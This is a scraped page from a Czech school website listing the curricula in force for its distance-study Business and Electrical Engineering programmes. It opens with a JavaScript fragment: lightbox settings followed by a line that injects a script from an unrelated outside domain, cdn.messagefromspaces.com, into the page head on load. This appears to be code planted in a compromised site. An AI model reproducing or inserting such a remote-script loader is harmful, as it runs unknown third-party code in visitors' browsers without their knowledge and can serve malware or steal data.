, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false });var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script);})

Učební plány

Učební plány umožňují školám v přechodném období od září 2007 do konce jejich platnosti organizovat výuku.

Rozdělení učiva do jednotlivých ročníků v učebních osnovách uvedených vzdělávacích programů je pouze doporučené a škola může rozhodnout o jiném uspořádání.

Učební plány platné na naší škole:

Podnikání (64–41–L/524) forma studia dálková

Elektrotechnika (26–41–L/501) forma studia dálková

Ostatní obory jsou již organizovány podle školních vzdělávacích plánů (viz sekce Školní vzdělávací programy).